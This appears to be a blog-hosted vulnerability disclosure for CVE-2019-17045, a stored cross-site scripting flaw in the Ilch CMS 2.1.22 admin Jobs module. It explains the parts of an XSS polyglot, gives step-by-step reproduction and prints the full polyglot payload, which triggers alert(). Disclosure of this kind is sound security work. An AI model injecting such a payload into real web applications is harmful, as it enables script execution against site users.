[CVE-2019-17045] Ilch – Content Management System V – 2.1.22 Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS – 2.1.22 02/01/22

Application Release Date: 23.05.2019

Severity: High

Authentication: Required

Complexity: Easy

Vulnerability Name: Stored Cross-site scripting – XSS Polyglot (Stored)

Vulnerability Explanation:  An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Anatomy of the polyglot

  • jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
  • /*-/*`/*\`/*’/*”/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
  • (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
  • //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
  • </stYle/</titLe/</teXtarEa/</scRipt/–!>: A sneaky HTML-tag-breaker sequence.
  • \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.

Impact:

Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page. Reflected cross-site scripting relies on a victim being socially engineered into clicking on a malicious link, sent via email for example.

Proof of Concept:  (Stored Cross site scripting – XSS Polyglot (Stored))

Affected items: ilchCMS  2.1.22

Step 1: Host the application using local web server xampp, install the Ilch CMS as per documentation.

Step 2: Go to admin panel

Step 3: Click Modules Tab

Step 4: Under the modules click Jobs Tab

Step 5: Enter the payload in all input field such as title, text, email id

Step 6: Finally click Add – Stored XSS will reflect back on the browser, even after refresh the stored XSS will reflect again.

Xss Payload used :

Html Comment:

<!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e

-->

Url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat

Reference:

Website: https://www.ilch.de/

Download Version: https://www.ilch.de/downloads-show-1826.html

Video POC:

Twitter – https://twitter.com/the_pr0fess0r_

Advertisement
Privacy Settings

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s